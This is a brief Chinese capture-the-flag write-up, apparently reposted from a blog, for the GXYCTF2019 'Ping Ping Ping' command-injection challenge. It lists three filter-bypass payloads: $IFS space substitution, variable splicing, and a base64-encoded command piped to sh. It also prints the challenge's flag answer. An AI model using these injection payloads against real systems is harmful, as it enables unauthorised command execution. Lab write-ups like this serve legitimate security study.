[GXYCTF2019]Ping Ping Ping

发布时间：2024年01月16日

1.访问页面，提示传参为ip。

2.?ip=明显存在命令执行注入，使用 ; 或者 | 闭合上一条命令。

经过fuzz测试，过滤了空格、bash字符、flag字符、以及一些特殊符号。
?ip=;ls时，发现flag.php就在当前目录下。

3.构造POC，获取Flag。

方案一：
	;a=g;cat$IFS$1fla$a.php
方案二：
	;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
方案三：
	;cat$IFS$9`ls`

$flag = "flag{dee32435-d7bd-485a-8fed-f61ac98d81d3}";

文章来源:https://blog.csdn.net/weixin_46601305/article/details/135591409
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：chenni525@qq.com进行投诉反馈，一经查实，立即删除！